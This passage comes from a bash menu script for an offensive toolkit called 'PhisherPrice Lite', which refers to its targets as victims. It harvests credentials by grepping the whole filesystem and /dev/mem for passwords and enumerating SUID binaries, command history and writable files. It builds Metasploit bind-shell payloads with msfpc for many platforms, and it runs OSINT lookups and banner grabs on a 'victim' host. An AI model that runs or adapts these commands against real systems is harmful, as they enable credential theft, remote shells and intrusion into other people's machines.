| cut -c 9- | tee -a $CURRENT_FILE 813 | done 814 | runTest "PCI_Devices" "lspci" 815 | runTest "PCI_Devices_(Detailed)" "lspci -v" 816 | runTest "USB_Devices" "lsusb" 817 | runTest "USB_Devices_(Detailed)" "lsusb -v" 818 | ###runTest "Dmesg_Info" "dmesg" 819 | 820 | 821 | ##++++++++++++++++ Software Data.rtf+++++++++++++++++++++++ 822 | CURRENT_FILE=$folderName/software_data.rtf 823 | touch $CURRENT_FILE 824 | insertHeader $projectName "Software_Info" 825 | insertPartition "Common_Packages" 826 | #checks if packages in the list are installed and tells thier version 827 | packages=("python" "python3" "mysql" "ruby" "perl" "bash" "ssh" "telnet") 828 | #packages can be added above to search more packages 829 | for i in "${packages[@]}" 830 | do 831 | version=$(apt-cache show $i 2>/dev/null | grep -m 1 Version | wc -l ) 832 | DETAIL="NOT INSTALLED" 833 | if [ $version == 1 ] 834 | then #if the package is installed, show the version 835 | DETAIL=$(apt-cache show $i 2>/dev/null | grep -m 1 Version | awk '{ printf "VERSION:" $2 "\n" }' ) 836 | fi 837 | printf "PACKAGE:${i}\t $DETAIL \n" | tee -a $CURRENT_FILE 838 | done 839 | runTest "Loadable_Kernel_Modules" "lsmod" 840 | runTest "Startup_Programs" "ls -lah /etc/init.d/" 841 | runTest "Installed_Programs" "apt list --installed" 842 | runTest "Services_Programs" "service --status-all" 843 | runTest "Systemctl_Programs" "systemctl status --all" 844 | 845 | ##++++++++++++++++ Process Data.rtf+++++++++++++++++++++++ 846 | CURRENT_FILE=$folderName/process_data.rtf 847 | touch $CURRENT_FILE 848 | insertHeader $projectName "Process Info" 849 | runTest "Top_5_CPU_Processes" "ps auxwwwf | sort -nr -k 3 | head -5" 850 | runTest "Top_5_Mem_Processes" "ps auxwwwf | sort -nr -k 4 | head -5" 851 | runTest "Current_Processes" "ps auxwwwf" 852 | runTest "Directory_of_Running_Processes" "ls -l /proc/*/cwd" 853 | runTest "Executable_of_Running_Processes" "ls -l /proc/*/exe" 854 | runTest "Arguements_of_Running_Processes" "grep -a ^ /proc/*/cmdline" 855 | runTest "Deleted_Binaries_Still_Running" "ls -aIR /proc/*/exe 2>/dev/null | grep deleted" 856 | # Running from tmp and dev need more testing/verification of functionality 857 | runTest "Proccesses Running From tmp" "ls -aIR /proc/*/cwd 2>/dev/null | grep tmp" 858 | runTest "Proccesses Running From dev" "ls -aIR /proc/*/cwd 2>/dev/null | grep dev" 859 | runTest "Cmd_History_Files" "find / -name *.history" 860 | runTest "Cmd_History" "history" 861 | 862 | ##++++++++++++++++ Password Data.rtf+++++++++++++++++++++++ 863 | CURRENT_FILE=$folderName/password_data.rtf 864 | touch $CURRENT_FILE 865 | insertHeader $projectName "Passwords" 866 | 867 | #This search for clear text passwords TAKES A LONG TIME 868 | COMMAND_STRING='grep -rnw "/" -ie "PASSWORD" 2> /dev/null' 869 | insertPartition "Clear_Text_Passwords" 870 | printf "($COMMAND_STRING)\n" >> $CURRENT_FILE 871 | eval $COMMAND_STRING >> $CURRENT_FILE 872 | printf "\n\n" >> $CURRENT_FILE 873 | 874 | runTest "More_Clear_Text_Passwords" 'find . -type f -exec grep -i -I "PASSWORD" {} /dev/null \;' 875 | runTest "Passwords_In_Memory" 'strings /dev/mem -n10 | grep -i PASS' 876 | 877 | ##++++++++++++++++ Misc Data.rtf+++++++++++++++++++++++ 878 | CURRENT_FILE=$folderName/misc_data.rtf 879 | touch $CURRENT_FILE 880 | insertHeader $projectName "Misc_Data" 881 | runTest "SUID_Binaries" "find / -perm -4000 -type f -exec ls -la {} 2>/dev/null" 882 | runTest "SGID_Binaries" "find / -perm -2000 -type f -exec ls -la {} 2>/dev/null" 883 | runTest "Binaries_Of_Interest" "find / -uid 0 -perm -4000 -type f 2>/dev/null" 884 | runTest "World_Writable_Files" "find / -writable ! -user `whoami` -type f ! -path "/proc/*" ! -path "/sys/*" -exec ls -al {} \; 2>/dev/null" 885 | runTest "World_Writable_Files" "find / -perm -2 -type f 2>/dev/null" 886 | runTest "World_Writable_Files" "find / ! -path "*/proc/*" -perm -2 -type f -print 2>/dev/null" 887 | runTest "Crontab_Jobs" "crontab -l" 888 | 889 | ## Collect Logs: find /var/log -mtime -$logDate -exec cp {} $tmp/logs/ \; nested folders are huge!! 890 | 891 | 892 | ##++++++++++++++++ Docker Data.rtf+++++++++++++++++++++++ 893 | ## CURRENT_FILE=$folderName/docker_data.rtf 894 | ## touch $CURRENT_FILE 895 | ## insertHeader $projectName "Docker_Container_Enumeration" 896 | 897 | ## runTest "" "" https://docs.docker.com/engine/reference/commandline/container_ls/ 898 | 899 | 900 | ##++++++++++++++++ Zip Data and Remove Files +++++++++++++++++++++++ 901 | CURRENT_FILE=$folderName/system_data.rtf 902 | DATE=$(date +"%d %B %Y") 903 | TIME=$(date +"%T") 904 | CURRENT_PATH=$(pwd) 905 | printf "\n\n" | tee -a $CURRENT_FILE 906 | printf "Process Completed\n" | tee -a $CURRENT_FILE 907 | printf -- "------------------------------------\n" | tee -a $CURRENT_FILE 908 | printf "End Time: \t $TIME\n" | tee -a $CURRENT_FILE 909 | printf "End Date: \t $DATE\n" | tee -a $CURRENT_FILE 910 | printf "\n\n" | tee -a $CURRENT_FILE 911 | 912 | ## END ## 913 | FINAL_PATH="$CURRENT_PATH/$folderName.tgz" 914 | printf "Compressing Results into Package\n\n" 915 | tar -czvf $FINAL_PATH $folderName/* 916 | printf "\nCleaning up\n\n" 917 | rm -rf $folderName 918 | printf "Results will be stored here: \t $FINAL_PATH \n\n" 919 | 920 | read 921 | elif [ "$x" == "$nopass" ]; then #hynull-Option-9 922 | get_user_names(){ 923 | nopass=`passwd -${1}a | grep -o "^.* NP"` 924 | 925 | for i in ${nopass/ /_} 926 | { 927 | nopassnames="${nopassnames:- } $i" 928 | } 929 | } 930 | 931 | if [[ "$OSTYPE" == *linux-gnu* ]]; then 932 | get_user_names S 933 | elif [[ "$OSTYPE" == *sunos* ]]; then 934 | get_user_names s 935 | fi 936 | 937 | if [ -z "$nopassnames" ] 938 | then 939 | echo "Good - All user accounts have a password." 940 | else 941 | echo "ERROR: The users listed below have no password set:"\ 942 | " ${nopassnames//_NP/}" 1>&2 943 | exit 1 944 | fi 945 | 946 | read 947 | 948 | else 949 | 950 | n 951 | 952 | 953 | fi 954 | 955 | elif [ "$x" == "$option3" ]; then #Option3 956 | clear 957 | echo -e '\e[1;33m 958 | ///, //// 959 | \ /, / >. 960 | \ /, _/ /. 961 | \_ /_/ /. 962 | \__/_ < PhisherPrice Lite 963 | /<<< \_\_ Serve & Demolish 964 | /,)^>>_._ \ Version 1.0.3 [BETA] 965 | (/ \\ /\\\ [\e[3;31m PUBLIC \e[1;33m] 966 | // //``` 967 | ------((`((--------------------\e[3;31m 968 | MSF Payload \e[1;33m 969 | ------------------------------- \e[0m\e[3;39m 970 | (1) Windows 971 | (2) Linux 972 | (3) OSX 973 | (4) APK 974 | (5) ASP 975 | (6) ASPX 976 | (7) Bash 977 | (8) Java 978 | (9) Perl 979 | (10) PHP 980 | (11) Powershell 981 | (12) Python 982 | (13) Tomcat 983 | (c) Launch msfconsole \e[1;33m 984 | ------------------------------- \e[0m\e[3;39m 985 | CTRL + C To Exit \e[1;33m 986 | ------------------------------- \e[0m\e[3;39m 987 | Press ENTER To Go To Main Menu \e[1;33m 988 | ------------------------------- \e[0m\e[3;39m' 989 | echo -e $Blue" ┌─["$red"S&D$Blue]──[$red~$Blue]─["$yellow"MSFP$Blue]" 990 | read -p " └─────► " x 991 | cyouro1='1' 992 | cyouro2='2' 993 | cyouro3='3' 994 | cyouro4='4' 995 | cyouro5='5' 996 | cyouro6='6' 997 | cyouro7='7' 998 | cyouro8='8' 999 | cyouro9='9' 1000 | cyouro10='10' 1001 | cyouro11='11' 1002 | cyouro12='12' 1003 | cyouro13='13' 1004 | cyouro14='c' 1005 | 1006 | if [ "$x" == "$cyouro1" ]; then #cyouro-Option-1 1007 | clear 1008 | 1009 | msfpc windows bind 5555 verbose 1010 | 1011 | read 1012 | 1013 | elif [ "$x" == "$cyouro2" ]; then #cyouro-Option-2 1014 | 1015 | clear 1016 | msfpc linux bind 5555 verbose 1017 | 1018 | read 1019 | 1020 | elif [ "$x" == "$cyouro3" ]; then #cyouro-Option-3 1021 | clear 1022 | 1023 | msfpc osx bind 5555 verbose 1024 | 1025 | read 1026 | 1027 | elif [ "$x" == "$cyouro4" ]; then #cyouro-Option-4 1028 | 1029 | clear 1030 | 1031 | msfpc apk bind 5555 verbose 1032 | 1033 | read 1034 | 1035 | elif [ "$x" == "$cyouro5" ]; then #cyouro-Option-5 1036 | clear 1037 | 1038 | msfpc asp bind 5555 verbose 1039 | 1040 | read 1041 | 1042 | elif [ "$x" == "$cyouro6" ]; then #cyouro-Option-6 1043 | clear 1044 | 1045 | msfpc aspx bind 5555 verbose 1046 | 1047 | read 1048 | 1049 | elif [ "$x" == "$cyouro7" ]; then #cyouro-Option-7 1050 | clear 1051 | 1052 | msfpc bash bind 5555 verbose 1053 | 1054 | read 1055 | 1056 | elif [ "$x" == "$cyouro8" ]; then #cyouro-Option-8 1057 | clear 1058 | 1059 | msfpc java bind 5555 verbose 1060 | 1061 | read 1062 | 1063 | elif [ "$x" == "$cyouro9" ]; then #cyouro-Option-9 1064 | clear 1065 | 1066 | msfpc perl bind 5555 verbose 1067 | 1068 | read 1069 | 1070 | elif [ "$x" == "$cyouro10" ]; then #cyouro-Option-10 1071 | clear 1072 | 1073 | msfpc php bind 5555 verbose 1074 | 1075 | read 1076 | 1077 | elif [ "$x" == "$cyouro11" ]; then #cyouro-Option-11 1078 | clear 1079 | 1080 | msfpc powershell bind 5555 verbose 1081 | 1082 | read 1083 | 1084 | elif [ "$x" == "$cyouro12" ]; then #cyouro-Option-12 1085 | clear 1086 | 1087 | msfpc python bind 5555 verbose 1088 | 1089 | read 1090 | 1091 | elif [ "$x" == "$cyouro13" ]; then #cyouro-Option-13 1092 | clear 1093 | 1094 | msfpc tomcat bind 5555 verbose 1095 | 1096 | read 1097 | 1098 | elif [ "$x" == "$cyouro14" ]; then #cyouro-Option-13 1099 | clear 1100 | msfconsole 1101 | 1102 | else 1103 | 1104 | n 1105 | 1106 | 1107 | fi 1108 | elif [ "$x" == "$option4" ]; then #Option3 1109 | clear 1110 | echo -e '\e[1;33m 1111 | ///, //// 1112 | \ /, / >. 1113 | \ /, _/ /. 1114 | \_ /_/ /. 1115 | \__/_ < PhisherPrice Lite 1116 | /<<< \_\_ Serve & Demolish 1117 | /,)^>>_._ \ Version 1.0.3 [BETA] 1118 | (/ \\ /\\\ [\e[3;31m PUBLIC \e[1;33m] 1119 | // //``` 1120 | ------((`((--------------------\e[3;31m 1121 | OSINT / INFORMATION GATHERING \e[1;33m 1122 | ------------------------------- \e[0m\e[3;39m 1123 | (0)AutoExif 1124 | (1) Whois Info 1125 | (2) Geo IP 1126 | (3) IP Lookup 1127 | (4) DNS Lookup 1128 | (5) Reverse DNS Lookup 1129 | (6) Shared DNS Lookup 1130 | (7) Reverse Analytics 1131 | (8) Autonomous System Lookup (AS/ASN/IP) 1132 | (9) Retreive HTTP Headers 1133 | (10) Banner Grab 1134 | (11) Link Sniffer 1135 | (12) Phone Number Lookup 1136 | (13) h8mail (Email) 1137 | (14) h8mail (Username) 1138 | (15) h8mail (IP) 1139 | (16) Cloudfare Resolver 1140 | (17) WhatWeb \e[1;33m 1141 | ------------------------------- \e[0m\e[3;39m 1142 | CTRL + C To Exit \e[1;33m 1143 | ------------------------------- \e[0m\e[3;39m 1144 | Press ENTER To Go To Main Menu \e[1;33m 1145 | ------------------------------- \e[0m\e[3;39m' 1146 | echo -e $Blue" ┌─["$red"S&D$Blue]──[$red~$Blue]─["$yellow"OSINT$Blue]" 1147 | read -p " └─────► " x 1148 | submenu31='1' 1149 | submenu32='2' 1150 | submenu33='3' 1151 | submenu34='4' 1152 | submenu35='5' 1153 | submenu36='6' 1154 | submenu37='7' 1155 | submenu38='8' 1156 | submenu39='9' 1157 | submenu310='10' 1158 | submenu311='11' 1159 | submenu312='12' 1160 | submenu313='13' 1161 | submenu314='14' 1162 | submenu315='15' 1163 | submenu316='16' 1164 | submenu317='17' 1165 | submenu318='0' 1166 | if [ "$x" == "$submenu318" ]; then #submenu3-Option-15 1167 | clear 1168 | echo -e '\e[1;33m 1169 | ///, //// 1170 | \ /, / >. 1171 | \ /, _/ /. 1172 | \_ /_/ /. 1173 | \__/_ < PhisherPrice Lite 1174 | /<<< \_\_ Serve & Demolish 1175 | /,)^>>_._ \ Version 1.0.3 [BETA] 1176 | (/ \\ /\\\ [\e[3;31m PUBLIC \e[1;33m] 1177 | // //``` 1178 | ------((`((--------------------\e[3;31m 1179 | AutoExif 1180 | Exif Tool AutoMated For Easy Conveinience \e[1;33m 1181 | ------------------------------- \e[0m\e[3;39m 1182 | (1) Read Image MetaData (Basic) 1183 | (2) Read Image MetaData (Expert) 1184 | (3) Read Imge MetaData (From Website) 1185 | (4) Wipe Data From Image (Except JFIF Groups) 1186 | (5) Wipe All GPS Data From Image 1187 | (6) Wipe All MetaData From Image (Adds Comment Back In) 1188 | (7) Extract GPS from AVCH video 1189 | (8) Extract Info From Thumbnail 1190 | (9) Wipe Photoshop MetaData 1191 | (10) Install ExifTool 1192 | (i) Help\e[1;33m 1193 | ------------------------------- \e[0m\e[3;39m 1194 | CTRL + C To Exit \e[1;33m 1195 | ------------------------------- \e[0m\e[3;39m 1196 | Press ENTER To Go To Main Menu \e[1;33m 1197 | ------------------------------- \e[0m\e[3;39m' 1198 | echo -e $Blue" ┌─["$red"S&D$Blue]──[$red~$Blue]─["$yellow"wAutoExif$Blue]" 1199 | read -p " └─────► " x 1200 | autoexiftool1='1' 1201 | autoexiftool2='2' 1202 | autoexiftool3='3' 1203 | autoexiftool4='4' 1204 | autoexiftool5='5' 1205 | autoexiftool6='6' 1206 | autoexiftool7='7' 1207 | autoexiftool8='8' 1208 | autoexiftool9='9' 1209 | autoexiftool10='10' 1210 | help='i' 1211 | 1212 | if [ "$x" == "$autoexiftool1" ]; then #readmetadata basic 1213 | echo "enter image name followed by its file type eg: /home/username/Pictures/lulz.png" 1214 | read meta1 1215 | echo -e ' 1216 | !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! 1217 | !!!! Extracting Data !!!!! 1218 | !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! 1219 | ' 1220 | 1221 | exiftool $meta1 1222 | 1223 | echo -e ' 1224 | !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! 1225 | !!!! Data Extracted using AutoExif !!!!! 1226 | !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! 1227 | Press ENTER To Go Back To The Main Menu 1228 | ' 1229 | 1230 | read 1231 | 1232 | 1233 | elif [ "$x" == "$autoexiftool2" ]; then #readmetadatadeep 1234 | echo "enter image name followed by its file type eg: /home/username/Pictures/lulz.png" 1235 | read mdeep 1236 | echo -e ' 1237 | !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! 1238 | !!!! Extracting Data !!!!! 1239 | !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! 1240 | ' 1241 | 1242 | cat $mdeep | exiftool - 1243 | 1244 | echo -e ' 1245 | !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! 1246 | !!!! Data Extracted using AutoExif !!!!! 1247 | !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! 1248 | Press ENTER To Go Back To The Main Menu 1249 | ' 1250 | 1251 | read 1252 | 1253 | elif [ "$x" == "$autoexiftool3" ]; then #webextract 1254 | echo "enter image location for eg: http://a.domain.com/bigfile.jpg" 1255 | read exifop1host 1256 | echo -e ' 1257 | !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! 1258 | !!!! Extracting Data !!!!! 1259 | !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! 1260 | ' 1261 | 1262 | curl -s $exifop1host | exiftool -fast - 1263 | 1264 | echo -e ' 1265 | !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! 1266 | !!!! Data Extracted using AutoExif !!!!! 1267 | !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! 1268 | Press ENTER To Go Back To The Main Menu 1269 | ' 1270 | 1271 | read 1272 | 1273 | elif [ "$x" == "$autoexiftool4" ]; then #autoexiftool4 1274 | echo "enter image name followed by its file type eg: /home/username/Pictures/lulz.png" 1275 | read exifop4 1276 | echo -e ' 1277 | !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! 1278 | !!!! Wiping JFIF Data !!!!! 1279 | !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! 1280 | ' 1281 | 1282 | exiftool -all= --jfif:all $exifop4 1283 | 1284 | echo -e ' 1285 | !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! 1286 | !!!! Data Wiped Using AutoExif !!!!! 1287 | !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! 1288 | Press ENTER To Go Back To The Main Menu 1289 | ' 1290 | 1291 | read 1292 | 1293 | 1294 | elif [ "$x" == "$autoexiftool5" ]; then #AVCHextract 1295 | echo "enter image name followed by its file type eg: /home/username/Pictures/lulz.png" 1296 | read exifop5 1297 | echo -e ' 1298 | !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! 1299 | !!!! Wiping GPS Data !!!!! 1300 | !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! 1301 | ' 1302 | 1303 | exiftool -gps:all= $exifop5 1304 | 1305 | echo -e ' 1306 | !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! 1307 | !!!! Data Wiped Using AutoExif !!!!! 1308 | !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! 1309 | Press ENTER To Go Back To The Main Menu 1310 | ' 1311 | 1312 | read 1313 | 1314 | elif [ "$x" == "$autoexiftool6" ]; then #autoexiftool6 1315 | echo "enter image name followed by its file type eg: /home/username/Pictures/lulz.png" 1316 | read exifop6 1317 | echo -e ' 1318 | !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! 1319 | !!!! Replacing Data !!!!! 1320 | !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! 1321 | ' 1322 | 1323 | exiftool -all= -comment='Protected By NULLSecurity Team' $exifop6 1324 | 1325 | echo -e ' 1326 | !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! 1327 | !!!!! Data Replaced Using AutoExif !!!!! 1328 | !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! 1329 | Press ENTER To Go Back To The Main Menu 1330 | ' 1331 | 1332 | read 1333 | 1334 | elif [ "$x" == "$autoexiftool7" ]; then #autoexiftool7 1335 | echo "enter image name followed by its file type eg: /home/username/Videos/lulz.m2ts" 1336 | read avch 1337 | echo -e ' 1338 | !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! 1339 | ! EXTRACTING PLEASE WAIT ! 1340 | !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! 1341 | 1342 | ' 1343 | 1344 | exiftool -ee -p '$gpslatitude, $gpslongitude, $gpstimestamp' $avch 1345 | 1346 | echo -e ' 1347 | !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! 1348 | !!!! Data Extracted using AutoExif !!!!! 1349 | !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! 1350 | Press ENTER To Go Back To The Main Menu 1351 | ' 1352 | 1353 | read 1354 | 1355 | 1356 | 1357 | elif [ "$x" == "$autoexiftool8" ]; then #AVCHExtract 1358 | echo "enter image name followed by its file type eg: /home/username/pictures/lulz.png" 1359 | read exif8 1360 | echo -e ' 1361 | !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! 1362 | ! EXTRACTING PLEASE WAIT ! 1363 | !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! 1364 | 1365 | ' 1366 | 1367 | exiftool $exif8 -thumbnailimage -b | exiftool - 1368 | 1369 | echo -e ' 1370 | !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! 1371 | !!!! Data Extracted using AutoExif !!!!! 1372 | !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! 1373 | Press ENTER To Go Back To The Main Menu 1374 | ' 1375 | 1376 | read 1377 | 1378 | 1379 | elif [ "$x" == "$autoexiftool9" ]; then #autoexiftool9 1380 | 1381 | echo -e ' 1382 | Delete Photoshop meta information from an image (note that the Photoshop informatio nalso includes IPTC). 1383 | enter image name followed by its file type eg: /home/username/pictures/lulz.jpg 1384 | ' 1385 | read psd 1386 | echo -e ' 1387 | !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! 1388 | ! EXTRACTING PLEASE WAIT ! 1389 | !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! 1390 | 1391 | ' 1392 | 1393 | exiftool -Photoshop:All= $psd 1394 | 1395 | echo -e ' 1396 | !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! 1397 | !!!! Data Extracted using AutoExif !!!!! 1398 | !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! 1399 | Press ENTER To Go Back To The Main Menu 1400 | ' 1401 | 1402 | read 1403 | 1404 | elif [ "$x" == "$autoexiftool10" ]; then #autoexiftool9 1405 | clear 1406 | echo -e '\e[0;31m-------------------------------\e[1;33m 1407 | ExifTool Installation 1408 | \e[0;31m-------------------------------\e[1;34m' 1409 | echo "Are You Sure You Want To Install ExifTool ?" 1410 | echo "PRESS ENTER TO START ANY OTHER OPTION TO CANCEL" 1411 | echo -e '\e[0;31m-------------------------------' 1412 | read -p "~" r 1413 | echo -e '\e[0;31m-------------------------------\e[0;39m' 1414 | $r sudo apt-get install exif libimage-exiftool-perl libstring-crc32-perl libgd-perl 1415 | echo -e '\e[0;31m-------------------------------\e[1;33m 1416 | Fully Installed ExifTool 1417 | \e[0;31m-------------------------------\e[1;34m' 1418 | echo "Press ENTER To Go Back To Main Menu" 1419 | echo -e '\e[0;31m-------------------------------' 1420 | read -p "~" 1421 | echo -e '\e[0;31m-------------------------------\e[0;39m' 1422 | read 1423 | 1424 | 1425 | elif [ "$x" == "$help" ]; then #autoexiftool10 1426 | 1427 | clear 1428 | echo -e '\e[1;33m 1429 | \e[0m 1430 | \e[1;31m 1431 | You can Put This Script In The Desired Folder You Like Where The Media 1432 | Is Located Then You can execute the script 1433 | when the script is in the media folder you want you can just type the 1434 | Image name Along with file type instead of typing the image location aswell 1435 | For eg: instead of /home/username/Pictures/lulz.png 1436 | I would just type : lulz.png 1437 | 1438 | you can find the original tool here https://github.com/sircryptic/autoexif 1439 | Press ENTER To Go Back To The Main Menu 1440 | ' 1441 | read 1442 | 1443 | 1444 | else 1445 | 1446 | n 1447 | 1448 | 1449 | fi 1450 | 1451 | elif [ "$x" == "$submenu31" ]; then #submenu3-Option-1 1452 | clear 1453 | echo -e '\e[0;31m-------------------------------\e[1;33m 1454 | WHOIS QUERY 1455 | \e[0;31m-------------------------------\e[1;34m' 1456 | echo "Victim's IP Or Website:" 1457 | echo -e '\e[0;31m-------------------------------' 1458 | read -p "~" r 1459 | echo -e '\e[0;31m-------------------------------\e[0;39m' 1460 | whois $r 1461 | echo ' ' 1462 | echo ' Press ENTER to Main Menu ' 1463 | echo ' ' 1464 | read 1465 | elif [ "$x" == "$submenu32" ]; then #submenu3-Option-2 1466 | clear 1467 | echo -e '\e[0;31m-------------------------------\e[1;33m 1468 | GEO IP LOOKUP 1469 | \e[0;31m-------------------------------\e[1;34m' 1470 | echo "Victim's IP Or Website:" 1471 | echo -e '\e[0;31m-------------------------------' 1472 | read -p "~" r 1473 | echo -e '\e[0;31m-------------------------------\e[0;39m' 1474 | curl http://api.hackertarget.com/geoip/?q=$r 1475 | echo ' ' 1476 | echo ' Press ENTER to Main Menu ' 1477 | echo ' ' 1478 | read 1479 | 1480 | elif [ "$x" == "$submenu33" ]; then #submenu3-Option-3 1481 | clear 1482 | echo -e '\e[0;31m-------------------------------\e[1;33m 1483 | REVERSE IP LOOKUP 1484 | \e[0;31m-------------------------------\e[1;34m' 1485 | echo "Victim's IP Or Website:" 1486 | echo -e '\e[0;31m-------------------------------' 1487 | read -p "~" r 1488 | echo -e '\e[0;31m-------------------------------\e[0;39m' 1489 | curl http://api.hackertarget.com/reverseiplookup/?q=$r 1490 | echo ' ' 1491 | echo ' Press ENTER to Main Menu ' 1492 | echo ' ' 1493 | read 1494 | 1495 | 1496 | elif [ "$x" == "$submenu34" ]; then #submenu3-Option-4 1497 | clear 1498 | echo -e '\e[0;31m-------------------------------\e[1;33m 1499 | DNS LOOKUP 1500 | \e[0;31m-------------------------------\e[1;34m' 1501 | echo "Victim's IP Or Website:" 1502 | echo -e '\e[0;31m-------------------------------' 1503 | read -p "~" r 1504 | echo -e '\e[0;31m-------------------------------\e[0;39m' 1505 | curl http://api.hackertarget.com/dnslookup/?q=$r 1506 | echo ' ' 1507 | echo ' Press ENTER to Main Menu ' 1508 | echo ' ' 1509 | read 1510 | 1511 | elif [ "$x" == "$submenu35" ]; then #submenu3-Option-5 1512 | clear 1513 | echo -e '\e[0;31m-------------------------------\e[1;33m 1514 | REVERSE DNS LOOKUP 1515 | \e[0;31m-------------------------------\e[1;34m' 1516 | echo "Victim's IP Or Website:" 1517 | echo -e '\e[0;31m-------------------------------' 1518 | read -p "~" r 1519 | echo -e '\e[0;31m-------------------------------\e[0;39m' 1520 | curl https://api.hackertarget.com/reversedns/?q=$r 1521 | echo ' ' 1522 | echo ' Press ENTER to Main Menu ' 1523 | echo ' ' 1524 | read 1525 | 1526 | elif [ "$x" == "$submenu36" ]; then #submenu3-Option-6 1527 | clear 1528 | echo -e '\e[0;31m-------------------------------\e[1;33m 1529 | SHARED DNS LOOKUP 1530 | \e[0;31m-------------------------------\e[1;34m' 1531 | echo "Victim's IP Or Website:" 1532 | echo -e '\e[0;31m-------------------------------' 1533 | read -p "~" r 1534 | echo -e '\e[0;31m-------------------------------\e[0;39m' 1535 | curl https://api.hackertarget.com/findshareddns/?q=$r 1536 | echo ' ' 1537 | echo ' Press ENTER to Main Menu ' 1538 | echo ' ' 1539 | read 1540 | 1541 | elif [ "$x" == "$submenu37" ]; then #submenu3-Option-7 1542 | clear 1543 | echo -e '\e[0;31m-------------------------------\e[1;33m 1544 | REVERSE ANALYTICS LOOKUP 1545 | \e[0;31m-------------------------------\e[1;34m' 1546 | echo "Find Domains Using Same Google Ad-Sense ID" 1547 | echo "Enter Domain Name Or GA-ID" 1548 | echo "For example: UA-11223344 or testsite.com" 1549 | echo -e '\e[0;31m-------------------------------' 1550 | read -p "~" r 1551 | echo -e '\e[0;31m-------------------------------\e[0;39m' 1552 | curl https://api.hackertarget.com/analyticslookup/?q=$r 1553 | echo ' ' 1554 | echo ' Press ENTER to Main Menu ' 1555 | echo ' ' 1556 | read 1557 | 1558 | elif [ "$x" == "$submenu38" ]; then #submenu3-Option-8 1559 | clear 1560 | echo -e '\e[0;31m-------------------------------\e[1;33m 1561 | ASN LOOKUP 1562 | \e[0;31m-------------------------------\e[1;34m' 1563 | echo "Enter The ASN You Want To Scan." 1564 | echo "example usage: 1.1.1.1 / AS15169" 1565 | echo -e '\e[0;31m-------------------------------' 1566 | read -p "~" r 1567 | echo -e '\e[0;31m-------------------------------\e[0;39m' 1568 | curl https://api.hackertarget.com/aslookup/?q=$r 1569 | echo ' ' 1570 | echo ' Press ENTER to Main Menu ' 1571 | echo ' ' 1572 | read 1573 | 1574 | elif [ "$x" == "$submenu39" ]; then #submenu3-Option-9 1575 | clear 1576 | echo -e '\e[0;31m-------------------------------\e[1;33m 1577 | RETRIEVE HTTP HEADERS 1578 | \e[0;31m-------------------------------\e[1;34m' 1579 | echo "Victim's IP Or Website:" 1580 | echo -e '\e[0;31m-------------------------------' 1581 | read -p "~" r 1582 | echo -e '\e[0;31m-------------------------------\e[0;39m' 1583 | curl https://api.hackertarget.com/httpheaders/?q=$r 1584 | echo ' ' 1585 | echo ' Press ENTER to Main Menu ' 1586 | echo ' ' 1587 | read 1588 | 1589 | elif [ "$x" == "$submenu310" ]; then #submenu3-Option-10 1590 | clear 1591 | echo -e '\e[0;31m-------------------------------\e[1;33m 1592 | BANNER GRAB 1593 | \e[0;31m-------------------------------\e[1;34m' 1594 | echo "Victim's IP Or Website:" 1595 | echo -e '\e[0;31m-------------------------------' 1596 | read -p "~" r 1597 | echo -e '\e[0;31m-------------------------------\e[0;39m' 1598 | curl https://api.hackertarget.com/bannerlookup/?q=$r 1599 | echo ' ' 1600 | echo ' Press ENTER to Main Menu ' 1601 | echo ' ' 1602 | read 1603 | 1604 | elif [ "$x" == "$submenu311" ]; then #submenu3-Option-11 1605 | clear 1606 | echo -e '\e[0;31m-------------------------------\e[1;33m 1607 | LINK SNIFFER / PULL LINKS FROM WEBSITE 1608 | \e[0;31m-------------------------------\e[1;34m' 1609 | echo "this can reveal social media pages etc." 1610 | echo "Victim's IP Or Website:" 1611 | echo -e '\e[0;31m-------------------------------' 1612 | read -p "~" r 1613 | echo -e '\e[0;31m-------------------------------\e[0;39m' 1614 | curl https://api.hackertarget.com/pagelinks/?q=$r 1615 | echo ' ' 1616 | echo ' 